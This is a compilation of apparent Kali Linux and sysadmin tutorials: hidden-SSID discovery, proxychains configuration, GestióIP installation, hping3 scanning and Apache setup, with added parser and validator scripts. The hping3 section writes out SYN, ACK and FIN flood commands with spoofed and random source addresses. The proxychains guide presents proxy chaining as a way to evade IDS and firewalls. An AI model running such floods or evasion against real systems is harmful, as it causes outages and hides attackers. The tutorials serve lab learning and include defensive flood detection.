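 F2:9F:C2:AA:6C:B9  -47       51        0    0   1  195  WPA2 CCMP   PSK  <length:  0>
"""

# Constructed snapshot 2: the targeted scan after a client joined (RXQ column present).
SNAPSHOT_2 = """\
CH  6 ][ Elapsed: 6 mins ][ 2019-07-15 20:27 ][ paused output

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 84:C9:B2:6A:9E:90  -24 100     3247      416    0   6  130  WPA2 CCMP   PSK  HoneyP01

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1      2        6
"""


def parse_ap_table(snapshot):
    """Return {bssid: {"ch": int, "essid": str, "hidden": bool}} from the AP section."""
    aps = {}
    ncols = None                      # fields before ESSID, learned from the header
    for raw in snapshot.splitlines():
        line = raw.strip()
        if line.startswith("BSSID") and "STATION" in line:
            break                     # the client table follows; stop here
        if line.startswith("BSSID") and "ESSID" in line:
            ncols = 11 if "RXQ" in line else 10
            continue
        if ncols is None:
            continue
        fields = line.split(None, ncols)   # ESSID may contain spaces, so it is the remainder
        if len(fields) < ncols or not MAC_RE.match(fields[0]):
            continue
        essid = fields[ncols].strip() if len(fields) > ncols else ""
        ch_index = 6 if ncols == 11 else 5
        aps[fields[0].upper()] = {
            "ch": int(fields[ch_index]),
            "essid": essid,
            "hidden": bool(HIDDEN_RE.match(essid)),
        }
    return aps


def hidden_networks(snapshot):
    """BSSIDs and channels of access points that do not broadcast their ESSID."""
    return {b: a["ch"] for b, a in parse_ap_table(snapshot).items() if a["hidden"]}


def resolve_hidden(before, after):
    """Hidden BSSIDs in `before` whose ESSID is visible in `after`, with the name seen."""
    early, late = parse_ap_table(before), parse_ap_table(after)
    resolved = {}
    for bssid, ap in early.items():
        if ap["hidden"] and bssid in late and not late[bssid]["hidden"]:
            resolved[bssid] = {"essid": late[bssid]["essid"], "ch": late[bssid]["ch"]}
    return resolved


if __name__ == "__main__":
    print("hidden:", hidden_networks(SNAPSHOT_1))
    print("resolved:", resolve_hidden(SNAPSHOT_1, SNAPSHOT_2))
```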

Conclusion

Uncovering a hidden SSID is easy because, when a device connects to an access point, the device and the access point exchange probe request and response packets.

We have covered some basic terminal commands to uncover a hidden SSID. All equipment used in the lab is mine. Please don't perform the commands on unauthorized networks.




Proxychains

How To Use Proxychains Kali Linux

Proxychains

Proxychains is open source software for Linux systems and comes preinstalled with Kali Linux. The tool redirects TCP connections through proxies such as Tor, SOCKS and HTTP(S) proxies, and it allows us to chain proxy servers.

With proxychains we can hide the IP address of the source traffic and evade IDS and firewalls. We can use proxychains in a lot of situations, such as when we want to avoid giving up our IP address while scanning a target or visiting a website.

Furthermore, chaining multiple proxies makes it difficult to track down the source IP address of the TCP connection, so the application gives us a way to hide ourselves and stay anonymous. However, proxy servers are likely to log your traffic and have to obey local law and jurisdiction.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Upgrade/Update & Install Tor

1.1 Upgrade and update the OS.

sudo apt-get update
sudo apt-get upgrade

1.2 Install the tor service.

sudo apt-get install tor

1.3 Start Tor service.

sudo service tor start

1.4 Display Tor service status.

sudo service tor status

NOTE: Tor service needs to run for proxychains to work.

Step 2: Configure Proxychains

2.1 The proxychains configuration file is located in the "/etc/" directory. Edit the configuration file.

sudo nano /etc/proxychains.conf

There are three chaining modes in which proxychains can run.

  1. strict_chain
  2. dynamic_chain
  3. random_chain

strict_chain: the default option in proxychains; every connection goes through the proxies in the order they are listed in the configuration file. Strict chaining is best used when you want the source traffic to appear to come from a particular location.

dynamic_chain: works like the strict chain but does not require all the proxies in the configuration file to be working. If a proxy is down, the connection skips to the next proxy server in the list.

random_chain: picks proxies at random from the list in the configuration file, so the chain of proxies will look different to the target each time.

Uncomment the "dynamic_chain" line to enable dynamic chaining.

dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain

NOTE: Uncomment "chain_len" if you are using random_chain; the parameter sets the number of proxies from the list that are used to build your randomized chain.

2.2 By default proxychains sends traffic through the host at 127.0.0.1 on port 9050. This is the default Tor configuration; if you are planning to use Tor, leave the entry under "defaults set to "tor"" as it is. If you are not using Tor, you will need to comment out this line.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

2.3 Add proxy servers to the proxychains configuration file. There are free proxy servers on the Internet; I am using free proxies in this lab. You can find them here; another good site with free proxies is spys.one.

Before adding custom proxies, add Tor SOCKS5 support with the line "socks5 127.0.0.1 9050".

# meanwile
# defaults set to "tor"
socks4         127.0.0.1 9050

SOCKS5          103.21.161.105 6667
HTTPS           156.202.174.101 8080
HTTPS           183.76.154.184 8080
HTTP            142.93.130.169 8118
SOCKS5          178.62.59.71 23187
SOCKS5          50.63.26.13 43001

2.4 Prevent DNS leaks: uncomment "proxy_dns" under the "Proxy DNS requests - no leak for DNS data" comment.

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns

Exit & Save
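As an added example, not part of the original guide, this Python script validates a proxychains.conf against the points from Step 2: one active chain mode, chain_len when random_chain is used, proxy_dns enabled, and well-formed [ProxyList] entries. The configuration text is constructed to mirror the guide's edits.

```python
"""Sanity-check a proxychains.conf before relying on it.

Added example, not part of the original guide: it checks the points the
guide walks through: exactly one chain mode is active, chain_len is set
when random_chain is used, proxy_dns is enabled so DNS lookups do not
leak, and every [ProxyList] entry has a known type, a host and a valid
port. The configuration text below is constructed to mirror the guide's
edits; on a real system pass the contents of /etc/proxychains.conf.
"""
import re

CHAIN_MODES = ("strict_chain", "dynamic_chain", "random_chain")
PROXY_TYPES = ("http", "https", "socks4", "socks5")
# type host port [user pass]
PROXY_RE = re.compile(r"^(?P<type>\S+)\s+(?P<host>\S+)\s+(?P<port>\S+)(?:\s+\S+\s+\S+)?$")
CHAIN_LEN_RE = re.compile(r"^chain_len\s*=\s*(\d+)$")

# Constructed sample reflecting the edits made in Step 2.
SAMPLE_CONF = """\
dynamic_chain
#strict_chain
#random_chain
#chain_len = 2
# Quiet mode (no output from library)
#quiet_mode
# Proxy DNS requests - no leak for DNS data
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# defaults set to "tor"
socks4  127.0.0.1 9050
socks5  127.0.0.1 9050
"""


def parse_conf(text):
    """Extract chain mode(s), chain_len, proxy_dns and the proxy list."""
    conf = {"modes": [], "chain_len": None, "proxy_dns": False, "proxies": [], "errors": []}
    in_list = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line == "[ProxyList]":
            in_list = True
            continue
        if in_list:
            m = PROXY_RE.match(line)
            ok = (m is not None and m.group("type").lower() in PROXY_TYPES
                  and m.group("port").isdigit() and 0 < int(m.group("port")) < 65536)
            if ok:
                conf["proxies"].append((m.group("type").lower(), m.group("host"), int(m.group("port"))))
            else:
                conf["errors"].append("line %d: bad proxy entry %r" % (lineno, line))
            continue
        if line in CHAIN_MODES:
            conf["modes"].append(line)
        elif line == "proxy_dns":
            conf["proxy_dns"] = True
        elif line.startswith("chain_len"):
            m = CHAIN_LEN_RE.match(line)
            if m:
                conf["chain_len"] = int(m.group(1))
            else:
                conf["errors"].append("line %d: unparsable chain_len %r" % (lineno, line))
    return conf


def review(text):
    """Return a list of problems; an empty list means the config looks consistent."""
    conf = parse_conf(text)
    problems = list(conf["errors"])
    if len(conf["modes"]) != 1:
        problems.append("exactly one chain mode must be uncommented, found: %s" % (conf["modes"] or "none"))
    elif conf["modes"][0] == "random_chain" and conf["chain_len"] is None:
        problems.append("random_chain is selected but chain_len is still commented out")
    if not conf["proxy_dns"]:
        problems.append("proxy_dns is commented out: DNS lookups will leak to the local resolver")
    if not conf["proxies"]:
        problems.append("[ProxyList] has no usable entries")
    return problems


if __name__ == "__main__":
    print(review(SAMPLE_CONF) or ["no problems found"])
```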

Step 3: Proxychains Syntax

3.1 Verify that proxychains is working.

proxychains firefox www.whatsmyip.org

3.2 Use Proxychains with nmap.

proxychains nmap 1.1.1.1

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 22:00 CEST
Nmap scan report for one.one.one.one (1.1.1.1)
Host is up (0.013s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
53/tcp  open  domain
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 57.22 seconds
root@iPhone:~#

Summary

We have covered how to run proxychains and hide the identity of our source traffic and stay anonymous without being detected.

Check out the Ethical Hacking notes for more Kali Linux quick guides.

DISCLAIMER: This software/tutorial is for educational purposes only.

The tutorial should not be used for illegal activity and the author is not responsible for its use or the users action.




Install GestióIP

How To Install GestióIP (IPAM) Ubuntu 18.04.02

In this guide I will install GestióIP. "GestióIP is an automated web based IPv4/IPv6 address management (IPAM) software".

GestioIP IPAM – IP Address Management

IP address management (IPAM) tools help us plan, deploy, manage and monitor IP addresses on our infrastructure.

GestióIP can automatically discover the IP addresses of servers and other devices that are connected to the network or have a domain name entry on the local DNS servers.

It can also send SNMP requests to gateways and get responses back about connected devices.

I am running Ubuntu 18.04.2 as operating system, but you can install the application on all major Linux distributions.

Prerequisite

  • Ubuntu Server 18.04
  • User with sudo privileges.
  • Static IP address
  • Host name

For more information on how to create a sudo user and configure a static IP please see the quick guides Create Sudo User , Set Static IP address and Configure Host-Name. Check out the Linux guides for more quick guides on basic Linux configuration.

Step 1: System Preparation

1.1 Let's start by updating the repositories and software packages.

sudo apt update -y
sudo apt upgrade -y

1.2 GestióIP requires an Apache Web Server and MySQL/MariaDB database, as well as some SNMP MIBs.

sudo apt-get install make mysql-server mysql-client apache2 apache2-utils libapache2-mod-perl2 snmp snmp-mibs-downloader wget

1.3 Download required MIBs

sudo download-mibs

1.4 Enable MIB loading for SNMP discovery by commenting out the line "mibs :" in /etc/snmp/snmp.conf

sudo nano /etc/snmp/snmp.conf 

# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
##mibs :

Exit & Save

Step 2: Configure MySQL

2.1 Start MySQL

sudo systemctl start mysql

2.2 Set a MySQL root password

sudo mysql_secure_installation

Set a root password and answer all following questions with “Y”

2.3 Change authentication plugin to “mysql_native_password”. Open the MySQL console.

sudo mysql

2.4 Switch to the mysql database

use mysql; 

2.5 Display current authentication plugin method for the root user

select Host, User, plugin from user where user="root";

mysql> select Host, User, plugin from user where user="root";
+-----------+------+-------------+
| Host      | User | plugin      |
+-----------+------+-------------+
| localhost | root | auth_socket |
+-----------+------+-------------+
1 row in set (0.00 sec)

2.6 Change authentication plugin to “mysql_native_password”

ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';

Replace ‘password’ with the password you want to set:

2.7 Display current authentication plugin method again

select Host, User, plugin from user where user="root";

mysql> select Host, User, plugin from user where user="root";
+-----------+------+-----------------------+
| Host      | User | plugin                |
+-----------+------+-----------------------+
| localhost | root | mysql_native_password |
+-----------+------+-----------------------+
1 row in set (0.00 sec)

2.8 Flush privileges and exit

FLUSH PRIVILEGES;

Exit

Step 3: Installation

3.1 Download the installation packet from www.gestioip.net and upload it to the server.

3.2 Unpack the gestioip_3.4.tar.gz file

sudo tar vzxf gestioip_3.4.tar.gz

3.3 Change to the gestioip_3.4 directory

cd gestioip_3.4

3.4 Run the installation script

sudo ./setup_gestioip.sh

“Setup will propose a couple of parameters e.g. (“Where is Apache daemon binary?”). If you do not have special requirements you can confirm all default parameters by typing ENTER.”

Enter Y to everything the script wants to install.

NOTE: The setup will ask for the user which should be created for the HTTP Standard Authentication.

The script does not create the user automatically. You need to open a second shell and create the user for HTTP Standard Authentication manually by running the command “htpasswd”.

Open a new terminal and enter

sudo /usr/bin/htpasswd -c /etc/apache2/users-gestioip gipadmin

Create the new password

3.5 Go back to terminal one and press enter and continue with the installation

+-------------------------------------------------------+
|                                                       |
|    Installation of GestioIP successfully finished!    |
|                                                       |
|   Please, review /etc/apache2/sites-enabled/gestioip.conf
|            to ensure all is good and                  |
|                                                       |
|              RESTART Apache daemon!                   |
|                                                       |
|            Then, point your browser to                |
|                                                       |
|           http://server/gestioip/install
|                                                       |
|          to configure the database server.            |
|         Access with user "gipadmin" and the
|        the password which you created before          |
|                                                       |
+-------------------------------------------------------+

origin@ipam:~/gestioip_3.4

3.6 Restart apache service

sudo systemctl restart apache2

3.7 Open the web-based database configuration to complete the installation: http://ip-address/gestioip/install

“Access with the rw-user and the password which you created during the setup with the command “htpasswd” (default rw-user: gipadmin):”

Step 4: Complete the installation

4.1 After entering credentials click “next” on the GestióIP’s installation “Welcome” site.

4.2 Enter the database configuration parameters and click “send”.

4.3 The following page shows whether the database was successfully created with the parameters you entered.

Click “next page” to proceed with the configuration.

4.4 On Configure Sites and Categories enter your site name and network category.

You can change all these values later via the web GUI.

Click “next” to proceed.

4.5 If the configuration was successfully created, click “next page” to proceed.

4.6 The last page shows if the installation has completed successfully.

If the installation was successful you will be asked to finish the installation by executing a command in the terminal window.

Copy the command and run it in the terminal on the server to delete the installation directory “/var/www/html/gestioip/install/”.

sudo rm -r /var/www/html/gestioip/install 

The installation is now complete and you can open the web GUI by opening http://Your-Server-IP-Address/gestioip/

For more information on how to configure GestióIP I recommend the official documentation, which you can find here.

Conclusion

In this quick guide we have installed GestióIP, an open source IPAM server, on Ubuntu 18.04.2 and done some basic configuration to get the server up and running.




How To Scan a Network With Hping3

Hping3

Hping3 is a command-line oriented TCP/IP packet assembler and analyser and works like Nmap.

The application is able to send customized TCP/IP packets and display the replies in the same way ping displays ICMP echo replies. Hping3 supports the TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files over a covert channel, and many other features, including DDoS flooding.

Hping3 can be used to perform:

  • OS fingerprinting
  • ICMP pings
  • Traceroute
  • Port scanning
  • Firewall testing
  • Test IDSes
  • Network testing and auditing
  • MTU discovery
  • Exploit and vulnerabilities discovery
  • DDOS and ICMP flooding

Hping3 comes pre-installed on Kali Linux and can also be installed on most Linux distros; the commands need to be run with sudo privileges. Visit the official documentation at http://www.hping.org/documentation.php to learn more about how you can use Hping3.

Useful Options

-h Show this help
-v Show version
-c Packet count
-i --interval Wait between packets
--flood Send packets as fast as possible, without showing replies
-V Verbose mode
-D Debugging
-f Fragment packets
-Q Display sequence number

-0 RAW IP mode
-1 ICMP mode
-2 UDP mode
-8 SCAN mode
-9 listen mode

-F Set the FIN flag
-S Set the SYN flag
-P Set the PUSH flag
-A Set the ACK flag
-U Set the URG flag

Commands

Send an ACK packet to a target

hping3 -A 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): A set, 40 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=29627 sport=0 flags=R seq=0 win=32767 rtt=4.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29628 sport=0 flags=R seq=1 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29629 sport=0 flags=R seq=2 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29632 sport=0 flags=R seq=3 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29633 sport=0 flags=R seq=4 win=32767 rtt=0.6 ms
len=46 ip=192.168.100.11 ttl=128 id=29634 sport=0 flags=R seq=5 win=32767 rtt=8.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29635 sport=0 flags=R seq=6 win=32767 rtt=7.1 ms
len=46 ip=192.168.100.11 ttl=128 id=29636 sport=0 flags=R seq=7 win=32767 rtt=7.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29637 sport=0 flags=R seq=8 win=32767 rtt=5.0 ms

Use the -c option to decide how many packets to send; in this example I am setting the count option to 5.

hping3 -A -c 5 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): A set, 40 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=30010 sport=0 flags=R seq=0 win=32767 rtt=7.9 ms
len=46 ip=192.168.100.11 ttl=128 id=30011 sport=0 flags=R seq=1 win=32767 rtt=7.0 ms
len=46 ip=192.168.100.11 ttl=128 id=30012 sport=0 flags=R seq=2 win=32767 rtt=7.6 ms
len=46 ip=192.168.100.11 ttl=128 id=30013 sport=0 flags=R seq=3 win=32767 rtt=5.1 ms
len=46 ip=192.168.100.11 ttl=128 id=30014 sport=0 flags=R seq=4 win=32767 rtt=4.0 ms

--- 192.168.100.11 hping statistic ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 4.0/6.3/7.9 ms

Create a SYN packet and use the scan mode to scan ports 1-1000 on a target.

hping3 -S -8 1-1000 192.168.100.11

Scanning 192.168.100.11 (192.168.100.11), port 1-1000
1000 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
   53 domain     : .S..A... 128 55677 64240    46
   88 kerberos   : .S..A... 128 55933 64240    46
  135 epmap      : .S..A... 128 56189 64240    46
  139 netbios-ssn: .S..A... 128 56445 64240    46
  389 ldap       : .S..A... 128 56701 64240    46
  445 microsoft-d: .S..A... 128 56957 64240    46
  464 kpasswd    : .S..A... 128 57213 64240    46
  593            : .S..A... 128 52863 64240    46
  636 ldaps      : .S..A... 128 53375 64240    46
All replies received. Done.
Not responding ports: (199 smux) (202 at-nbp) (203 ) (204 at-echo) (299 ) (300 ) (301 ) (306 ) (307 ) (308 ) (309 ) (312 ) (313 ) (407 ) (500 isakmp) (514 shell) (723 ) (729 ) (743 ) (761 ) (763 ) (764 ) (766 ) (767 ) (768 ) (769 ) (772 ) (782 ) (783 spamd) (784 ) (790 ) (791 ) (793 ) (794 ) (798 ) (799 ) (802 ) (803 ) (804 ) (805 ) (808 omirr) (809 ) (810 ) (811 ) (812 ) (813 ) (817 ) (818 ) (819 ) (820 ) (821 ) (822 ) (823 ) (824 ) (825 ) (827 ) (828 ) (829 ) (831 ) (832 ) (833 ) (834 ) (836 ) (837 ) (838 ) (839 ) (840 ) (841 ) (842 ) (843 ) (844 ) (845 ) (846 ) (847 ) (848 ) (849 ) (854 ) (855 ) (858 ) (878 ) (879 ) (880 ) (881 ) (911 ) (912 ) (913 ) (918 )
root@iPhone:~#
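The scan table above is easy to read by eye but awkward to compare between runs or against an approved service list. What follows is an added example, not part of the original guide or of hping3 itself: a small POSIX shell/awk parser that pulls out the ports which answered with SYN+ACK from `hping3 -8` output and diffs them against a baseline of services the host is supposed to expose. The input is the scan table from this guide embedded as a constructed string, and the function names are my own.

```shell
#!/bin/sh
# Added example: parse hping3 scan-mode (-8) output and compare against a baseline.
# Constructed sample input: the scan table shown in this guide.
HPING_SCAN_SAMPLE='Scanning 192.168.100.11 (192.168.100.11), port 1-1000
1000 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
   53 domain     : .S..A... 128 55677 64240    46
   88 kerberos   : .S..A... 128 55933 64240    46
  135 epmap      : .S..A... 128 56189 64240    46
  139 netbios-ssn: .S..A... 128 56445 64240    46
  389 ldap       : .S..A... 128 56701 64240    46
  445 microsoft-d: .S..A... 128 56957 64240    46
  464 kpasswd    : .S..A... 128 57213 64240    46
  593            : .S..A... 128 52863 64240    46
  636 ldaps      : .S..A... 128 53375 64240    46
All replies received. Done.
Not responding ports: (199 smux) (202 at-nbp) (203 ) (204 at-echo)'

# open_ports: read hping3 -8 output on stdin and print one port per line for
# every reply that carries both SYN and ACK, i.e. a listener accepted the SYN.
open_ports() {
    awk -F: '
        # data rows look like "  445 microsoft-d: .S..A... 128 56957 64240    46";
        # the service name may be empty, so split on the colon first
        NF >= 2 && $1 ~ /^ *[0-9]+/ {
            split($1, left, " ")          # left[1] is the port number
            split($2, right, " ")         # right[1] is the flag string
            if (right[1] ~ /S/ && right[1] ~ /A/) print left[1]
        }'
}

# open_port_list: the same ports on one space-separated line.
open_port_list() {
    open_ports | tr '\n' ' ' | sed 's/ $//'
}

open_port_count() {
    open_ports | wc -l | tr -d ' '
}

# unexpected_open_ports "P1 P2 ...": open ports that are not in the baseline
# list of services the host is supposed to expose.
unexpected_open_ports() {
    baseline=" $1 "
    open_ports | while read -r port; do
        case "$baseline" in
            *" $port "*) ;;               # expected listener
            *) echo "$port" ;;
        esac
    done
}
```

Save a scan with `hping3 -S -8 1-1000 HOST | tee scan.txt` and run `unexpected_open_ports "53 88 135 139 389 445 464 636" < scan.txt`; anything it prints is a listener that is not on the approved list and deserves a look.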

Use UDP mode to send UDP packets to port 80 on a target; if the UDP port is open you will get a response back. This is useful when the target has blocked ICMP ping.

hping3 -2 192.168.100.17 -c 2 -p 80

Create a ping packet and use the ICMP mode.

hping3 -1 -c 4 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): icmp mode set, 28 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=34163 icmp_seq=0 rtt=8.1 ms
len=46 ip=192.168.100.11 ttl=128 id=34164 icmp_seq=1 rtt=5.9 ms
len=46 ip=192.168.100.11 ttl=128 id=34167 icmp_seq=2 rtt=4.0 ms
len=46 ip=192.168.100.11 ttl=128 id=34168 icmp_seq=3 rtt=3.0 ms

--- 192.168.100.11 hping statistic ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 3.0/5.2/8.1 ms
root@iPhone:~#

Traceroute to a target using ICMP mode with verbose output.

hping3 --traceroute -V -1 192.168.100.11

using eth0, addr: 172.168.200.110, MTU: 1500
HPING google.com (eth0 216.58.211.142): icmp mode set, 28 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=172.168.200.2 name=_gateway
hop=1 hoprtt=3.9 ms
hop=2 TTL 0 during transit from ip=192.168.10.1 name=UNKNOWN
hop=2 hoprtt=2.0 ms
hop=3 TTL 0 during transit from ip=10.33.221.74 name=UNKNOWN
hop=3 hoprtt=8.9 ms
hop=4 TTL 0 during transit from ip=88.129.174.18 name=gbg1.dr8.a3network.se
hop=4 hoprtt=8.9 ms
hop=5 TTL 0 during transit from ip=88.129.128.62 name=gbg1.a7network.se
hop=5 hoprtt=8.0 ms
hop=6 TTL 0 during transit from ip=85.8.9.16 name=gbg1.cr1.a3network.se
hop=6 hoprtt=6.9 ms
hop=7 TTL 0 during transit from ip=85.8.10.20 name=sto2.cr1.a3network.se

Traceroute to determine whether port 443 is open, with the local traffic sent from source port 8080.

hping3 --traceroute -V -S -p 443 -s 8080 google.com

using eth0, addr: 172.168.200.110, MTU: 1500
HPING google.com (eth0 216.58.211.142): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=172.168.200.2 name=_gateway
hop=1 hoprtt=8.9 ms
len=46 ip=216.58.211.142 ttl=128 id=34374 tos=0 iplen=44
sport=443 flags=SA seq=8 win=64240 rtt=13.8 ms
seq=905581660 ack=1390210946 sum=3cce urp=0

len=46 ip=216.58.211.142 ttl=128 id=34376 tos=0 iplen=44
sport=443 flags=SA seq=9 win=64240 rtt=13.9 ms
seq=277232268 ack=486133387 sum=5a24 urp=0

len=46 ip=216.58.211.142 ttl=128 id=34377 tos=0 iplen=44
sport=443 flags=SA seq=10 win=64240 rtt=13.0 ms
seq=1939483389 ack=2029365982 sum=8498 urp=0

len=46 ip=216.58.211.142 ttl=128 id=34378 tos=0 iplen=44
sport=443 flags=SA seq=11 win=64240 rtt=12.9 ms
seq=90127368 ack=1561834414 sum=c208 urp=0

Use the TTL in traceroute to find the IP addresses of load balancing devices.

hping3 -S 192.168.100.100 -p 80 -T --ttl 13 --tr-keep-ttl -n 

Ping a subnet in random order instead of sequentially, using the --rand-dest option and the interface option -I eth0.

hping3 -1 192.168.100.x --rand-dest -I eth0 

Send an ICMP packet to request a timestamp from a target; if the target has ICMP echo responses blocked it won't answer ordinary pings, but it might still respond to a timestamp request.

hping3 -1 192.168.100.17 --icmp-ts -c 3

Malicious Commands

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action, always perform the attacks on your own lab system.

Commonly used parameters.

  • The --flood parameter activates the fastest packet sending mode
  • The -p “destport” parameter specifies the destination port
  • The --spoof parameter specifies which IP address to use as the spoofed source
  • The --rand-source parameter activates a random source address
  • The --interface parameter is used to specify the interface

Main attack flags.

  • The -S parameter sets the SYN flag
  • The -A parameter sets the ACK flag
  • The -F parameter sets the FIN flag
  • The -R parameter sets the RESET flag
  • The -P parameter sets the PUSH flag
  • The -U parameter sets the URGENT flag

To start a SYN flood attack run the command below

NOTE: When running these commands hping3 will not show any output; it is working in the background.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S

Use hping3 to run a SYN flood attack with an inactive spoofed IP address from the network.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S --spoof [INACTIVE_IP]

SYN flood attack with a random source IP address.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S --rand-source

ACK flood attack.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -A

FIN flood attack.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -F
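Seen from the receiving host, the floods above show up as a pile of sockets stuck in SYN-RECV. The block below is an added example written for the defender's side, not part of the original guide or of hping3: it reads the output of `ss -tan state syn-recv` (with a state filter ss omits the State column), counts half-open connections per local port and distinct peer addresses, and flags ports above a threshold. The `ss` listing is constructed sample data using documentation address ranges, and the function names are my own.

```shell
#!/bin/sh
# Added example (defender side): count half-open TCP connections per local port
# from `ss -tan state syn-recv` output. Constructed sample in that format; the
# peer addresses are documentation ranges.
SS_SYNRECV_SAMPLE='Recv-Q Send-Q Local Address:Port  Peer Address:Port
0      0      192.168.100.11:80   203.0.113.17:41022
0      0      192.168.100.11:80   203.0.113.58:55109
0      0      192.168.100.11:80   198.51.100.2:3344
0      0      192.168.100.11:80   203.0.113.91:40012
0      0      192.168.100.11:443  198.51.100.7:51234'

# synrecv_per_port: "count port" per local port, busiest first.
synrecv_per_port() {
    awk 'NR > 1 && NF >= 4 {
            n = split($3, a, ":")         # last piece after the colon is the port,
            count[a[n]]++                 # which also works for [::]:80 style IPv6
         }
         END { for (p in count) print count[p], p }' | sort -rn
}

# flooded_ports THRESHOLD: local ports with at least THRESHOLD sockets in SYN-RECV.
flooded_ports() {
    synrecv_per_port | awk -v t="$1" '$1 >= t { print $2 }' | tr '\n' ' ' | sed 's/ $//'
}

# distinct_peers: how many different source addresses are waiting in SYN-RECV.
# A large number that never completes the handshake points at a --rand-source flood.
distinct_peers() {
    awk 'NR > 1 && NF >= 4 { sub(/:[0-9]+$/, "", $4); seen[$4] = 1 }
         END { n = 0; for (k in seen) n++; print n }'
}
```

On the server under test run `ss -tan state syn-recv | flooded_ports 200` and `ss -tan state syn-recv | distinct_peers`. A high count from one address is the spoofed or unspoofed single-source variant and can be rate limited per source at the firewall; a high count spread over many addresses that never complete the handshake is the random-source variant, where the kernel's SYN cookies (net.ipv4.tcp_syncookies=1, the Ubuntu default) keep the listen queue usable.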

Conclusion

In this lab we have covered the basic commands in hping3: we assembled TCP and UDP packets and used them to scan networks and discover devices. As always when doing this kind of scan, make sure you are authorized to scan the networks and devices you are targeting.




How To Install Apache2 (LAMP) Ubuntu 18.04

How to install apache2 (LAMP) server

LAMP is an acronym of the names of the applications in the stack: the Linux OS, the Apache web server, the MySQL database and the PHP programming language.

Together they form a framework to run web applications and host sites like WordPress. All applications in the stack are open source and available on most Linux distributions.

Requirements

  1. Ubuntu 18.04 LTS
  2. SSH access to the server (Setup SSH)
  3. A non root user with sudo privileges (Add sudo user)
  4. Enabled firewall (Setup ufw)
  5. Configured hostname (Setup hostname)
  6. DNS entries

Step 1: Install Apache2

1.1 Let's start by updating the repositories and software packages.

sudo apt update 
sudo apt upgrade -y

1.2 Install the apache2 package.

sudo apt install apache2 -y

1.3 Confirm installation.

sudo systemctl status apache2

● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; enabled; vendor preset:
  Drop-In: /lib/systemd/system/apache2.service.d
           └─apache2-systemd.conf
   Active: active (running) since Wed 2019-06-19 19:08:58 UTC; 3min 21s ago
 Main PID: 7685 (apache2)
    Tasks: 55 (limit: 2213)
   CGroup: /system.slice/apache2.service
           ├─7685 /usr/sbin/apache2 -k start
           ├─7878 /usr/sbin/apache2 -k start
           └─7879 /usr/sbin/apache2 -k start

Jun 19 19:08:48 iphone systemd[1]: Starting The Apache HTTP Server...
Jun 19 19:08:58 iphone apachectl[7660]: AH00558: apache2: Could not reliably det
Jun 19 19:08:58 iphone systemd[1]: Started The Apache HTTP Server.

toor@iphone:~$

Step 2: Configure Firewall

2.1 Add firewall rules for Apache.

sudo ufw allow in "Apache Full"

Rule added
Rule added (v6)
toor@iphone:~$

2.2 Display firewall rules and confirm that the firewall is configured

sudo ufw status

Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
OpenSSH                    ALLOW       Anywhere
21/tcp                     ALLOW       Anywhere
40000:50000/tcp            ALLOW       Anywhere
990/tcp                    ALLOW       Anywhere
Apache Full                ALLOW       Anywhere
22/tcp (v6)                ALLOW       Anywhere (v6)
OpenSSH (v6)               ALLOW       Anywhere (v6)
21/tcp (v6)                ALLOW       Anywhere (v6)
40000:50000/tcp (v6)       ALLOW       Anywhere (v6)
